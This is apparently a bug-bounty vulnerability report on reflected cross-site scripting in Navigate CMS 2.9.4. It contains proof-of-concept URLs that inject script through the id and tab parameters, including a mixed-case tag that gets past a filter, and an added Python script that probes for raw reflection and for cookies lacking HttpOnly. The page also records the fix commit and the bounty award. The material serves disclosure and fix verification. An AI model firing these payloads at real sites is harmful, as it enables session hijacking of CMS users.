Cross-site Scripting (XSS) - Reflected in navigatecms/navigate-cms

Valid

Reported on

Jan 30th 2022


Description

Cross-Site Scripting (XSS) is a vulnerability that allows an attacker to execute arbitrary JavaScript in a victim's browser. In this report the `id` query parameter of navigate.php (and, on one endpoint, the `tab` parameter) is reflected into the response page unsanitised, so script supplied in the URL runs in the browser of whoever opens it.

Proof of Concept

Parameters: id (and tab on endpoint 3)

Payload: <script>alert(document.cookie)</script>

Affected endpoints:

On Firefox browser, visit:

1 http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&op=replace_file&id=%3Cscript%3Ealert(%22xss-1%22)%3C/script%3E

2 http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

3 http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&op=replace_file&id=%3CsCriPt%3Ealert(%22XSS-1%22)%3C/sCriPt%3E&tab=%3CsCriPt%3Ealert(%22XSS-2%22)%3C/sCriPt%3E

An alert box pops up showing the user's cookies (endpoint 2) or the string xss-1 (endpoints 1 and 3). Endpoint 3 also pops XSS-2 from the `tab` parameter, and its mixed-case `<sCriPt>` tag shows that no case-sensitive tag filter is in the way.

Impact

An attacker who gets a victim to open a crafted URL can run script in the victim's authenticated session. Unless the session cookie is flagged HttpOnly, that script can read it via document.cookie and send it to an attacker-controlled host; even with HttpOnly set, the script can still act on the victim's behalf inside the CMS.
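To reproduce the three requests in the Proof of Concept and to check the cookie-theft claim above, the following Python script is an added example; it is not part of the original report or of Navigate CMS. It takes the base URL and the three query strings from the report, classifies whether each injected parameter comes back verbatim (exploitable) or HTML-encoded (fixed), and lists session cookies that lack HttpOnly. The sample response bodies and Set-Cookie headers at the bottom are constructed for illustration only.

```python
"""Reflection and cookie-flag check for the navigate.php `id` / `tab` parameters.

Added example, not the report's or the project's code. The base URL and the
three query strings are taken from the report; everything else is assumed.
"""
import html
import urllib.parse
import urllib.request

# Base URL as used in the report (adjust to the target under test).
BASE = "http://localhost/navigate2.9.4/navigate/navigate.php"

# The three affected requests from the report, as query dictionaries.
AFFECTED = [
    {"fid": "files", "act": "edit", "op": "replace_file",
     "id": '<script>alert("xss-1")</script>'},
    {"fid": "files", "act": "edit",
     "id": "<script>alert(document.cookie)</script>"},
    {"fid": "files", "act": "edit", "op": "replace_file",
     "id": '<sCriPt>alert("XSS-1")</sCriPt>',
     "tab": '<sCriPt>alert("XSS-2")</sCriPt>'},
]

# Parameters carrying the payload.
INJECTED = ("id", "tab")


def build_url(base, params):
    """URL-encode the query exactly as a browser would (< becomes %3C, " becomes %22)."""
    return base + "?" + urllib.parse.urlencode(params)


def classify(body, payload):
    """'raw' if the payload appears verbatim in the response (exploitable),
    'encoded' if only its HTML-escaped form appears (output encoding in place),
    'absent' if the value is not reflected at all."""
    if payload in body:
        return "raw"
    if html.escape(payload, quote=True) in body or html.escape(payload, quote=False) in body:
        return "encoded"
    return "absent"


def check_response(body, params):
    """Verdict per injected parameter present in this request."""
    return {name: classify(body, params[name]) for name in INJECTED if name in params}


def httponly_missing(set_cookie_headers):
    """Names of cookies set without the HttpOnly flag; these are readable via document.cookie."""
    missing = []
    for header in set_cookie_headers:
        parts = [p.strip() for p in header.split(";")]
        name = parts[0].split("=", 1)[0]
        if not any(p.lower() == "httponly" for p in parts[1:]):
            missing.append(name)
    return missing


def probe(base=BASE, requests=AFFECTED, timeout=10):
    """Send each affected request (unauthenticated) and return (url, verdicts, cookies_without_httponly)."""
    results = []
    for params in requests:
        url = build_url(base, params)
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            charset = resp.headers.get_content_charset() or "utf-8"
            body = resp.read().decode(charset, "replace")
            cookies = resp.headers.get_all("Set-Cookie") or []
        results.append((url, check_response(body, params), httponly_missing(cookies)))
    return results


# Constructed sample responses (not captured from Navigate CMS) showing the
# two outcomes the classifier distinguishes.
VULNERABLE_BODY = '<input name="id" value="<script>alert(document.cookie)</script>">'
FIXED_BODY = '<input name="id" value="&lt;script&gt;alert(document.cookie)&lt;/script&gt;">'
SAMPLE_COOKIES = ["PHPSESSID=abc123; path=/", "remember=x; Path=/; HttpOnly; Secure"]

if __name__ == "__main__":
    for url, verdicts, exposed in probe():
        print(verdicts, "cookies without HttpOnly:", exposed, url)
```

Run it against a local 2.9.4 instance before the fix and every `id`/`tab` verdict should read `raw`; after commit f9af8c the same values should come back `encoded`. The `raw` check is a plain substring match, so a response that reflects the value but strips or lowercases the tag name would be reported as `absent` and deserves a manual look rather than being treated as safe.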

We are processing your report and will contact the navigatecms/navigate-cms team within 24 hours. 4 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 4 months ago
Faisal Fs
4 months ago

Researcher


@admin, it has been fixed.

https://github.com/NavigateCMS/Navigate-CMS/commit/f9af8cbf4831599c9092a22f9f931cf1db8c3876

Jamie Slome validated this vulnerability 4 months ago
Faisal Fs has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome confirmed that a fix has been merged on f9af8c 4 months ago
The fix bounty has been dropped
files.php#L298 has been validated